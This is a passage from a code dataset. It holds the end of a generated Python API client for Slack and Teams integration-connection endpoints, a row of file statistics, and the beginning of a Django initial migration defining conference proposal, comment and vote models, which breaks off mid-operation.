    opts = dict(kwargs, _return_http_data_only=True)
    return self.start_slack_connection_flow_with_http_info(**opts)  # noqa: E501
def start_slack_connection_flow_with_http_info(self, **kwargs):  # noqa: E501
    """start_slack_connection_flow  # noqa: E501

    Begin the Slack OAuth connection flow, returning the full HTTP
    response information (status code, headers; no body is deserialized).

    ### Required permissions * User account permission: `system:admin-access`

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request:

    >>> thread = api.start_slack_connection_flow_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str ordering: Which field to use when ordering the results.
    :param int limit: Number of results to return per page.
    :param int offset: The initial index from which to return the results.
    :param _return_http_data_only: return the response body without status
                                   code and headers
    :param _preload_content: if False, the raw urllib3.HTTPResponse object is
                             returned without reading/decoding response data.
                             Default is True.
    :param _request_timeout: total request timeout (number) or a
                             (connection, read) tuple of timeouts.
    :return: None
        If the method is called asynchronously, returns the request thread.
    """
    # Keyword arguments this endpoint accepts.
    accepted = (
        'ordering',
        'limit',
        'offset',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    )
    params = {}
    for name in kwargs:
        if name not in accepted:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method start_slack_connection_flow" % name
            )
        params[name] = kwargs[name]

    # Optional pagination/ordering query parameters, in a fixed order.
    query_params = [
        (opt, params[opt])
        for opt in ('ordering', 'limit', 'offset')
        if params.get(opt) is not None
    ]

    return self.api_client.call_api(
        '/api/2/integrations/slack/connect', 'GET',
        {},    # no path parameters
        query_params,
        {},    # no header parameters
        body=None,
        post_params=[],
        files={},
        response_type=None,  # noqa: E501
        auth_settings=['Bearer'],  # Authentication setting
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def start_slack_connection_token_refresh_flow(self, id, **kwargs):  # noqa: E501
    """start_slack_connection_token_refresh_flow  # noqa: E501

    Begin the token-refresh flow for an existing Slack connection;
    delegates to ``start_slack_connection_token_refresh_flow_with_http_info``.

    ### Required permissions * User account permission: `system:admin-access`

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request:

    >>> thread = api.start_slack_connection_token_refresh_flow(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: A unique integer value identifying this Slack connection. (required)
    :param _preload_content: if False, the raw urllib3.HTTPResponse object is
                             returned without reading/decoding response data.
                             Default is True.
    :param _request_timeout: total request timeout (number) or a
                             (connection, read) tuple of timeouts.
    :return: None
        If the method is called asynchronously, returns the request thread.
    """
    # Force body-only return; the *_with_http_info variant does the work.
    opts = dict(kwargs, _return_http_data_only=True)
    return self.start_slack_connection_token_refresh_flow_with_http_info(id, **opts)  # noqa: E501
def start_slack_connection_token_refresh_flow_with_http_info(self, id, **kwargs):  # noqa: E501
    """start_slack_connection_token_refresh_flow # noqa: E501

    Start the token-refresh flow for one Slack connection, returning the
    full HTTP response information.
    ### Required permissions * User account permission: `system:admin-access`

    Synchronous by default; pass ``async_req=True`` for an async request:

    >>> thread = api.start_slack_connection_token_refresh_flow_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: A unique integer value identifying this Slack connection. (required)
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the raw urllib3.HTTPResponse object is
                             returned without reading/decoding response data.
                             Default is True.
    :param _request_timeout: total timeout (single number) or a
                             (connection, read) timeout tuple.
    :return: None
             If the method is called asynchronously, returns the request thread.
    """
    # Snapshot the named arguments; extra keywords are merged in below.
    local_var_params = locals()

    # Every keyword this endpoint accepts, including client plumbing kwargs.
    accepted = {'id', 'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout'}
    extra = local_var_params.pop('kwargs')
    for key, val in six.iteritems(extra):
        if key not in accepted:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method start_slack_connection_token_refresh_flow" % key
            )
        local_var_params[key] = val

    # `id` is required — reject a missing/None value up front.
    if self.api_client.client_side_validation and local_var_params.get('id') is None:  # noqa: E501
        raise ApiValueError("Missing the required parameter `id` when calling `start_slack_connection_token_refresh_flow`")  # noqa: E501

    path_params = {'id': local_var_params['id']}

    return self.api_client.call_api(
        '/api/2/integrations/slack/{id}/refresh-token', 'GET',
        path_params,
        [],    # no query parameters
        {},    # no header parameters
        body=None,
        post_params=[],
        files={},
        response_type=None,  # noqa: E501
        auth_settings=['Bearer'],  # Bearer-token authentication
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats={})
def start_teams_connection_flow(self, **kwargs):  # noqa: E501
    """start_teams_connection_flow # noqa: E501

    Kick off the Microsoft Teams connection flow.
    ### Required permissions * User account permission: `system:admin-access`

    Synchronous by default; pass ``async_req=True`` to get a request
    thread back instead:

    >>> thread = api.start_teams_connection_flow(async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str ordering: Which field to use when ordering the results.
    :param int limit: Number of results to return per page.
    :param int offset: The initial index from which to return the results.
    :param str team:
    :param _preload_content: if False, the raw urllib3.HTTPResponse object is
                             returned without reading/decoding response data.
                             Default is True.
    :param _request_timeout: total timeout (single number) or a
                             (connection, read) timeout tuple.
    :return: None
             If the method is called asynchronously, returns the request thread.
    """
    # Delegate to the *_with_http_info variant, asking for the body only.
    kwargs.update(_return_http_data_only=True)
    return self.start_teams_connection_flow_with_http_info(**kwargs)  # noqa: E501
def start_teams_connection_flow_with_http_info(self, **kwargs):  # noqa: E501
    """start_teams_connection_flow # noqa: E501

    Kick off the Microsoft Teams connection flow, returning the full HTTP
    response information.
    ### Required permissions * User account permission: `system:admin-access`

    Synchronous by default; pass ``async_req=True`` for an async request:

    >>> thread = api.start_teams_connection_flow_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str ordering: Which field to use when ordering the results.
    :param int limit: Number of results to return per page.
    :param int offset: The initial index from which to return the results.
    :param str team:
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the raw urllib3.HTTPResponse object is
                             returned without reading/decoding response data.
                             Default is True.
    :param _request_timeout: total timeout (single number) or a
                             (connection, read) timeout tuple.
    :return: None
             If the method is called asynchronously, returns the request thread.
    """
    # Snapshot the named arguments; extra keywords are merged in below.
    local_var_params = locals()

    # Every keyword this endpoint accepts, including client plumbing kwargs.
    accepted = {'ordering', 'limit', 'offset', 'team',
                'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout'}
    extra = local_var_params.pop('kwargs')
    for key, val in six.iteritems(extra):
        if key not in accepted:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method start_teams_connection_flow" % key
            )
        local_var_params[key] = val

    # Forward only the query parameters the caller actually supplied,
    # in the endpoint's canonical order.
    query_params = [
        (name, local_var_params[name])
        for name in ('ordering', 'limit', 'offset', 'team')
        if local_var_params.get(name) is not None
    ]

    return self.api_client.call_api(
        '/api/2/integrations/teams/connect', 'GET',
        {},    # no path parameters
        query_params,
        {},    # no header parameters
        body=None,
        post_params=[],
        files={},
        response_type=None,  # noqa: E501
        auth_settings=['Bearer'],  # Bearer-token authentication
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats={})
def start_teams_connection_token_refresh_flow(self, id, **kwargs):  # noqa: E501
    """start_teams_connection_token_refresh_flow # noqa: E501

    Kick off the token-refresh flow for one Teams connection.
    ### Required permissions * User account permission: `system:admin-access`

    Synchronous by default; pass ``async_req=True`` to get a request
    thread back instead:

    >>> thread = api.start_teams_connection_token_refresh_flow(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: A unique integer value identifying this Teams connection. (required)
    :param str team:
    :param _preload_content: if False, the raw urllib3.HTTPResponse object is
                             returned without reading/decoding response data.
                             Default is True.
    :param _request_timeout: total timeout (single number) or a
                             (connection, read) timeout tuple.
    :return: None
             If the method is called asynchronously, returns the request thread.
    """
    # Delegate to the *_with_http_info variant, asking for the body only.
    kwargs.update(_return_http_data_only=True)
    return self.start_teams_connection_token_refresh_flow_with_http_info(id, **kwargs)  # noqa: E501
def start_teams_connection_token_refresh_flow_with_http_info(self, id, **kwargs):  # noqa: E501
    """start_teams_connection_token_refresh_flow # noqa: E501

    Start the token-refresh flow for one Teams connection, returning the
    full HTTP response information.
    ### Required permissions * User account permission: `system:admin-access`

    Synchronous by default; pass ``async_req=True`` for an async request:

    >>> thread = api.start_teams_connection_token_refresh_flow_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: A unique integer value identifying this Teams connection. (required)
    :param str team:
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the raw urllib3.HTTPResponse object is
                             returned without reading/decoding response data.
                             Default is True.
    :param _request_timeout: total timeout (single number) or a
                             (connection, read) timeout tuple.
    :return: None
             If the method is called asynchronously, returns the request thread.
    """
    # Snapshot the named arguments; extra keywords are merged in below.
    local_var_params = locals()

    # Every keyword this endpoint accepts, including client plumbing kwargs.
    accepted = {'id', 'team', 'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout'}
    extra = local_var_params.pop('kwargs')
    for key, val in six.iteritems(extra):
        if key not in accepted:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method start_teams_connection_token_refresh_flow" % key
            )
        local_var_params[key] = val

    # `id` is required — reject a missing/None value up front.
    if self.api_client.client_side_validation and local_var_params.get('id') is None:  # noqa: E501
        raise ApiValueError("Missing the required parameter `id` when calling `start_teams_connection_token_refresh_flow`")  # noqa: E501

    path_params = {'id': local_var_params['id']}

    # `team` is the only optional query parameter.
    query_params = [
        (name, local_var_params[name])
        for name in ('team',)
        if local_var_params.get(name) is not None
    ]

    return self.api_client.call_api(
        '/api/2/integrations/teams/{id}/refresh-token', 'GET',
        path_params,
        query_params,
        {},    # no header parameters
        body=None,
        post_params=[],
        files={},
        response_type=None,  # noqa: E501
        auth_settings=['Bearer'],  # Bearer-token authentication
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats={})
def update_slack_connection(self, id, slack_connection, **kwargs):  # noqa: E501
    """update_slack_connection # noqa: E501

    Replace one Slack connection with the supplied representation.
    ### Required permissions * User account permission: `None` (read) / `system:admin-access` (write)

    Synchronous by default; pass ``async_req=True`` to get a request
    thread back instead:

    >>> thread = api.update_slack_connection(id, slack_connection, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: A unique integer value identifying this Slack connection. (required)
    :param SlackConnection slack_connection: (required)
    :param _preload_content: if False, the raw urllib3.HTTPResponse object is
                             returned without reading/decoding response data.
                             Default is True.
    :param _request_timeout: total timeout (single number) or a
                             (connection, read) timeout tuple.
    :return: SlackConnection
             If the method is called asynchronously, returns the request thread.
    """
    # Delegate to the *_with_http_info variant, asking for the body only.
    kwargs.update(_return_http_data_only=True)
    return self.update_slack_connection_with_http_info(id, slack_connection, **kwargs)  # noqa: E501
def update_slack_connection_with_http_info(self, id, slack_connection, **kwargs):  # noqa: E501
    """update_slack_connection # noqa: E501

    Replace one Slack connection, returning the full HTTP response
    information.
    ### Required permissions * User account permission: `None` (read) / `system:admin-access` (write)

    Synchronous by default; pass ``async_req=True`` for an async request:

    >>> thread = api.update_slack_connection_with_http_info(id, slack_connection, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: A unique integer value identifying this Slack connection. (required)
    :param SlackConnection slack_connection: (required)
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the raw urllib3.HTTPResponse object is
                             returned without reading/decoding response data.
                             Default is True.
    :param _request_timeout: total timeout (single number) or a
                             (connection, read) timeout tuple.
    :return: tuple(SlackConnection, status_code(int), headers(HTTPHeaderDict))
             If the method is called asynchronously, returns the request thread.
    """
    # Snapshot the named arguments; extra keywords are merged in below.
    local_var_params = locals()

    # Every keyword this endpoint accepts, including client plumbing kwargs.
    accepted = {'id', 'slack_connection', 'async_req',
                '_return_http_data_only', '_preload_content',
                '_request_timeout'}
    extra = local_var_params.pop('kwargs')
    for key, val in six.iteritems(extra):
        if key not in accepted:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_slack_connection" % key
            )
        local_var_params[key] = val

    # Both positional parameters are required — reject missing/None values.
    if self.api_client.client_side_validation and local_var_params.get('id') is None:  # noqa: E501
        raise ApiValueError("Missing the required parameter `id` when calling `update_slack_connection`")  # noqa: E501
    if self.api_client.client_side_validation and local_var_params.get('slack_connection') is None:  # noqa: E501
        raise ApiValueError("Missing the required parameter `slack_connection` when calling `update_slack_connection`")  # noqa: E501

    path_params = {'id': local_var_params['id']}

    # Negotiate the response Accept type first, then the request body type.
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(
            ['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/api/2/integrations/slack/{id}', 'PUT',
        path_params,
        [],    # no query parameters
        header_params,
        body=local_var_params.get('slack_connection'),
        post_params=[],
        files={},
        response_type='SlackConnection',  # noqa: E501
        auth_settings=['Bearer'],  # Bearer-token authentication
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats={})
def update_teams_connection(self, id, teams_connection, **kwargs):  # noqa: E501
    """update_teams_connection # noqa: E501

    Replace one Teams connection with the supplied representation.
    ### Required permissions * User account permission: `None` (read) / `system:admin-access` (write)

    Synchronous by default; pass ``async_req=True`` to get a request
    thread back instead:

    >>> thread = api.update_teams_connection(id, teams_connection, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: A unique integer value identifying this Teams connection. (required)
    :param TeamsConnection teams_connection: (required)
    :param _preload_content: if False, the raw urllib3.HTTPResponse object is
                             returned without reading/decoding response data.
                             Default is True.
    :param _request_timeout: total timeout (single number) or a
                             (connection, read) timeout tuple.
    :return: TeamsConnection
             If the method is called asynchronously, returns the request thread.
    """
    # Delegate to the *_with_http_info variant, asking for the body only.
    kwargs.update(_return_http_data_only=True)
    return self.update_teams_connection_with_http_info(id, teams_connection, **kwargs)  # noqa: E501
def update_teams_connection_with_http_info(self, id, teams_connection, **kwargs):  # noqa: E501
    """update_teams_connection # noqa: E501

    Replace one Teams connection, returning the full HTTP response
    information.
    ### Required permissions * User account permission: `None` (read) / `system:admin-access` (write)

    Synchronous by default; pass ``async_req=True`` for an async request:

    >>> thread = api.update_teams_connection_with_http_info(id, teams_connection, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: A unique integer value identifying this Teams connection. (required)
    :param TeamsConnection teams_connection: (required)
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the raw urllib3.HTTPResponse object is
                             returned without reading/decoding response data.
                             Default is True.
    :param _request_timeout: total timeout (single number) or a
                             (connection, read) timeout tuple.
    :return: tuple(TeamsConnection, status_code(int), headers(HTTPHeaderDict))
             If the method is called asynchronously, returns the request thread.
    """
    # Snapshot the named arguments; extra keywords are merged in below.
    local_var_params = locals()

    # Every keyword this endpoint accepts, including client plumbing kwargs.
    accepted = {'id', 'teams_connection', 'async_req',
                '_return_http_data_only', '_preload_content',
                '_request_timeout'}
    extra = local_var_params.pop('kwargs')
    for key, val in six.iteritems(extra):
        if key not in accepted:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_teams_connection" % key
            )
        local_var_params[key] = val

    # Both positional parameters are required — reject missing/None values.
    if self.api_client.client_side_validation and local_var_params.get('id') is None:  # noqa: E501
        raise ApiValueError("Missing the required parameter `id` when calling `update_teams_connection`")  # noqa: E501
    if self.api_client.client_side_validation and local_var_params.get('teams_connection') is None:  # noqa: E501
        raise ApiValueError("Missing the required parameter `teams_connection` when calling `update_teams_connection`")  # noqa: E501

    path_params = {'id': local_var_params['id']}

    # Negotiate the response Accept type first, then the request body type.
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(
            ['application/json']),  # noqa: E501
    }

    return self.api_client.call_api(
        '/api/2/integrations/teams/{id}', 'PUT',
        path_params,
        [],    # no query parameters
        header_params,
        body=local_var_params.get('teams_connection'),
        post_params=[],
        files={},
        response_type='TeamsConnection',  # noqa: E501
        auth_settings=['Bearer'],  # Bearer-token authentication
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats={})
| 48.64147
| 151
| 0.606834
| 12,974
| 115,183
| 5.134808
| 0.017034
| 0.044432
| 0.063465
| 0.02837
| 0.990213
| 0.989778
| 0.986761
| 0.981132
| 0.980321
| 0.975367
| 0
| 0.015004
| 0.3172
| 115,183
| 2,367
| 152
| 48.662019
| 0.83206
| 0.472049
| 0
| 0.811374
| 1
| 0
| 0.177134
| 0.060022
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040758
| false
| 0
| 0.004739
| 0
| 0.086256
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4dce77c9981af886b2a18610ea15e6cbc316f937
| 18,950
|
py
|
Python
|
junction/proposals/migrations/0001_initial.py
|
theSage21/junction
|
ac713edcf56c41eb3f066da776a0a5d24e55b46a
|
[
"MIT"
] | 192
|
2015-01-12T06:21:24.000Z
|
2022-03-10T09:57:37.000Z
|
junction/proposals/migrations/0001_initial.py
|
theSage21/junction
|
ac713edcf56c41eb3f066da776a0a5d24e55b46a
|
[
"MIT"
] | 621
|
2015-01-01T09:19:17.000Z
|
2021-05-28T09:27:35.000Z
|
junction/proposals/migrations/0001_initial.py
|
theSage21/junction
|
ac713edcf56c41eb3f066da776a0a5d24e55b46a
|
[
"MIT"
] | 207
|
2015-01-05T16:39:06.000Z
|
2022-02-15T13:18:15.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import django_extensions.db.fields
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial schema for the proposals app.

    Creates the core proposal models (Proposal, ProposalSection,
    ProposalType), the per-conference mapping models
    (ConferenceProposalSection, ConferenceProposalType), the comment/vote
    models (ProposalComment, ProposalCommentVote, ProposalVote), then wires
    up the FK fields and unique-together constraints that reference models
    created later in the operation list.

    NOTE(review): the ``b"..."`` choice labels and ``b" On hold"`` (with its
    leading space) are preserved as-is — presumably Python 2 era artifacts
    that are now part of the recorded migration state; do not "fix" them here.
    """

    dependencies = [
        # Depends on whichever user model the project swapped in, plus the
        # conferences app (Conference is a FK target below).
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ("conferences", "0001_initial"),
    ]

    operations = [
        # --- ConferenceProposalSection: links a ProposalSection to a Conference ---
        migrations.CreateModel(
            name="ConferenceProposalSection",
            fields=[
                (
                    "id",
                    models.AutoField(
                        verbose_name="ID",
                        serialize=False,
                        auto_created=True,
                        primary_key=True,
                    ),
                ),
                (
                    "created_at",
                    models.DateTimeField(auto_now_add=True, verbose_name="Created At"),
                ),
                (
                    "modified_at",
                    models.DateTimeField(
                        auto_now=True, verbose_name="Last Modified At"
                    ),
                ),
                (
                    "active",
                    models.BooleanField(default=True, verbose_name="Is Active?"),
                ),
                (
                    "conference",
                    models.ForeignKey(
                        to="conferences.Conference", on_delete=models.deletion.CASCADE,
                    ),
                ),
                # created_by/modified_by are nullable audit fields on the user model.
                (
                    "created_by",
                    models.ForeignKey(
                        related_name="created_conferenceproposalsection_set",
                        verbose_name="Created By",
                        blank=True,
                        on_delete=models.deletion.CASCADE,
                        to=settings.AUTH_USER_MODEL,
                        null=True,
                    ),
                ),
                (
                    "modified_by",
                    models.ForeignKey(
                        related_name="updated_conferenceproposalsection_set",
                        verbose_name="Modified By",
                        blank=True,
                        on_delete=models.deletion.CASCADE,
                        to=settings.AUTH_USER_MODEL,
                        null=True,
                    ),
                ),
            ],
            options={},
            bases=(models.Model,),
        ),
        # --- ConferenceProposalType: links a ProposalType to a Conference ---
        migrations.CreateModel(
            name="ConferenceProposalType",
            fields=[
                (
                    "id",
                    models.AutoField(
                        verbose_name="ID",
                        serialize=False,
                        auto_created=True,
                        primary_key=True,
                    ),
                ),
                (
                    "created_at",
                    models.DateTimeField(auto_now_add=True, verbose_name="Created At"),
                ),
                (
                    "modified_at",
                    models.DateTimeField(
                        auto_now=True, verbose_name="Last Modified At"
                    ),
                ),
                (
                    "active",
                    models.BooleanField(default=True, verbose_name="Is Active?"),
                ),
                (
                    "conference",
                    models.ForeignKey(
                        to="conferences.Conference", on_delete=models.deletion.CASCADE,
                    ),
                ),
                (
                    "created_by",
                    models.ForeignKey(
                        related_name="created_conferenceproposaltype_set",
                        verbose_name="Created By",
                        blank=True,
                        on_delete=models.deletion.CASCADE,
                        to=settings.AUTH_USER_MODEL,
                        null=True,
                    ),
                ),
                (
                    "modified_by",
                    models.ForeignKey(
                        related_name="updated_conferenceproposaltype_set",
                        verbose_name="Modified By",
                        blank=True,
                        on_delete=models.deletion.CASCADE,
                        to=settings.AUTH_USER_MODEL,
                        null=True,
                    ),
                ),
            ],
            options={},
            bases=(models.Model,),
        ),
        # --- Proposal: the talk/workshop submission itself ---
        migrations.CreateModel(
            name="Proposal",
            fields=[
                (
                    "id",
                    models.AutoField(
                        verbose_name="ID",
                        serialize=False,
                        auto_created=True,
                        primary_key=True,
                    ),
                ),
                (
                    "created_at",
                    models.DateTimeField(auto_now_add=True, verbose_name="Created At"),
                ),
                (
                    "modified_at",
                    models.DateTimeField(
                        auto_now=True, verbose_name="Last Modified At"
                    ),
                ),
                ("title", models.CharField(max_length=255)),
                # Slug is auto-derived from the title; unique per conference
                # (see the AlterUniqueTogether on "proposal" below).
                (
                    "slug",
                    django_extensions.db.fields.AutoSlugField(
                        populate_from=("title",),
                        max_length=255,
                        editable=False,
                        blank=True,
                    ),
                ),
                ("description", models.TextField(default="")),
                (
                    "target_audience",
                    models.PositiveSmallIntegerField(
                        default=1,
                        verbose_name="Target Audience",
                        choices=[
                            (1, b"Beginner"),
                            (2, b"Intermediate"),
                            (3, b"Advanced"),
                        ],
                    ),
                ),
                ("prerequisites", models.TextField(default="")),
                ("content_urls", models.TextField(default="")),
                ("speaker_info", models.TextField(default="")),
                ("speaker_links", models.TextField(default="")),
                (
                    "status",
                    models.PositiveSmallIntegerField(
                        default=1,
                        choices=[(1, b"Draft"), (2, b"Public"), (3, b"Cancelled")],
                    ),
                ),
                (
                    "review_status",
                    models.PositiveSmallIntegerField(
                        default=1,
                        verbose_name="Review Status",
                        choices=[
                            (1, b"Yet to be reviewed"),
                            (2, b"Selected"),
                            (3, b"Rejected"),
                            (4, b" On hold"),
                            (5, b"Wait-listed"),
                        ],
                    ),
                ),
                # Soft-delete flag; rows are flagged rather than removed.
                (
                    "deleted",
                    models.BooleanField(default=False, verbose_name="Is Deleted?"),
                ),
                (
                    "author",
                    models.ForeignKey(
                        verbose_name="Primary Speaker",
                        to=settings.AUTH_USER_MODEL,
                        on_delete=models.deletion.CASCADE,
                    ),
                ),
                (
                    "conference",
                    models.ForeignKey(
                        to="conferences.Conference", on_delete=models.deletion.CASCADE,
                    ),
                ),
            ],
            options={},
            bases=(models.Model,),
        ),
        # --- ProposalComment: discussion thread entries on a proposal ---
        migrations.CreateModel(
            name="ProposalComment",
            fields=[
                (
                    "id",
                    models.AutoField(
                        verbose_name="ID",
                        serialize=False,
                        auto_created=True,
                        primary_key=True,
                    ),
                ),
                (
                    "created_at",
                    models.DateTimeField(auto_now_add=True, verbose_name="Created At"),
                ),
                (
                    "modified_at",
                    models.DateTimeField(
                        auto_now=True, verbose_name="Last Modified At"
                    ),
                ),
                (
                    "private",
                    models.BooleanField(default=False, verbose_name="Is Private?"),
                ),
                ("comment", models.TextField()),
                (
                    "deleted",
                    models.BooleanField(default=False, verbose_name="Is Deleted?"),
                ),
                (
                    "commenter",
                    models.ForeignKey(
                        to=settings.AUTH_USER_MODEL, on_delete=models.deletion.CASCADE,
                    ),
                ),
                (
                    "proposal",
                    models.ForeignKey(
                        to="proposals.Proposal", on_delete=models.deletion.CASCADE,
                    ),
                ),
            ],
            options={"abstract": False},
            bases=(models.Model,),
        ),
        # --- ProposalCommentVote: one up/down vote per (comment, voter) ---
        migrations.CreateModel(
            name="ProposalCommentVote",
            fields=[
                (
                    "id",
                    models.AutoField(
                        verbose_name="ID",
                        serialize=False,
                        auto_created=True,
                        primary_key=True,
                    ),
                ),
                (
                    "created_at",
                    models.DateTimeField(auto_now_add=True, verbose_name="Created At"),
                ),
                (
                    "modified_at",
                    models.DateTimeField(
                        auto_now=True, verbose_name="Last Modified At"
                    ),
                ),
                ("up_vote", models.BooleanField(default=True)),
                (
                    "proposal_comment",
                    models.ForeignKey(
                        to="proposals.ProposalComment",
                        on_delete=models.deletion.CASCADE,
                    ),
                ),
                (
                    "voter",
                    models.ForeignKey(
                        to=settings.AUTH_USER_MODEL, on_delete=models.deletion.CASCADE,
                    ),
                ),
            ],
            options={},
            bases=(models.Model,),
        ),
        # --- ProposalSection: named track/section a proposal belongs to ---
        migrations.CreateModel(
            name="ProposalSection",
            fields=[
                (
                    "id",
                    models.AutoField(
                        verbose_name="ID",
                        serialize=False,
                        auto_created=True,
                        primary_key=True,
                    ),
                ),
                (
                    "created_at",
                    models.DateTimeField(auto_now_add=True, verbose_name="Created At"),
                ),
                (
                    "modified_at",
                    models.DateTimeField(
                        auto_now=True, verbose_name="Last Modified At"
                    ),
                ),
                (
                    "name",
                    models.CharField(
                        max_length=255, verbose_name="Proposal Section Name"
                    ),
                ),
                ("description", models.TextField(default="")),
                (
                    "active",
                    models.BooleanField(default=True, verbose_name="Is Active?"),
                ),
                (
                    "created_by",
                    models.ForeignKey(
                        related_name="created_proposalsection_set",
                        verbose_name="Created By",
                        blank=True,
                        on_delete=models.deletion.CASCADE,
                        to=settings.AUTH_USER_MODEL,
                        null=True,
                    ),
                ),
                (
                    "modified_by",
                    models.ForeignKey(
                        related_name="updated_proposalsection_set",
                        verbose_name="Modified By",
                        blank=True,
                        on_delete=models.deletion.CASCADE,
                        to=settings.AUTH_USER_MODEL,
                        null=True,
                    ),
                ),
            ],
            options={"abstract": False},
            bases=(models.Model,),
        ),
        # --- ProposalType: e.g. talk vs workshop ---
        migrations.CreateModel(
            name="ProposalType",
            fields=[
                (
                    "id",
                    models.AutoField(
                        verbose_name="ID",
                        serialize=False,
                        auto_created=True,
                        primary_key=True,
                    ),
                ),
                (
                    "created_at",
                    models.DateTimeField(auto_now_add=True, verbose_name="Created At"),
                ),
                (
                    "modified_at",
                    models.DateTimeField(
                        auto_now=True, verbose_name="Last Modified At"
                    ),
                ),
                (
                    "name",
                    models.CharField(max_length=255, verbose_name="Proposal Type Name"),
                ),
                ("description", models.TextField(default="")),
                (
                    "active",
                    models.BooleanField(default=True, verbose_name="Is Active?"),
                ),
                (
                    "created_by",
                    models.ForeignKey(
                        related_name="created_proposaltype_set",
                        verbose_name="Created By",
                        blank=True,
                        on_delete=models.deletion.CASCADE,
                        to=settings.AUTH_USER_MODEL,
                        null=True,
                    ),
                ),
                (
                    "modified_by",
                    models.ForeignKey(
                        related_name="updated_proposaltype_set",
                        verbose_name="Modified By",
                        blank=True,
                        on_delete=models.deletion.CASCADE,
                        to=settings.AUTH_USER_MODEL,
                        null=True,
                    ),
                ),
            ],
            options={"abstract": False},
            bases=(models.Model,),
        ),
        # --- ProposalVote: one public/reviewer vote per (proposal, voter) ---
        migrations.CreateModel(
            name="ProposalVote",
            fields=[
                (
                    "id",
                    models.AutoField(
                        verbose_name="ID",
                        serialize=False,
                        auto_created=True,
                        primary_key=True,
                    ),
                ),
                (
                    "created_at",
                    models.DateTimeField(auto_now_add=True, verbose_name="Created At"),
                ),
                (
                    "modified_at",
                    models.DateTimeField(
                        auto_now=True, verbose_name="Last Modified At"
                    ),
                ),
                (
                    "role",
                    models.PositiveSmallIntegerField(
                        default=1, choices=[(1, b"Public"), (2, b"Reviewer")]
                    ),
                ),
                ("up_vote", models.BooleanField(default=True)),
                (
                    "proposal",
                    models.ForeignKey(
                        to="proposals.Proposal", on_delete=models.deletion.CASCADE,
                    ),
                ),
                (
                    "voter",
                    models.ForeignKey(
                        to=settings.AUTH_USER_MODEL, on_delete=models.deletion.CASCADE,
                    ),
                ),
            ],
            options={},
            bases=(models.Model,),
        ),
        # Uniqueness constraints and cross-model FKs, added after all the
        # referenced models exist.
        migrations.AlterUniqueTogether(
            name="proposalvote", unique_together=set([("proposal", "voter")]),
        ),
        migrations.AlterUniqueTogether(
            name="proposalcommentvote",
            unique_together=set([("proposal_comment", "voter")]),
        ),
        migrations.AddField(
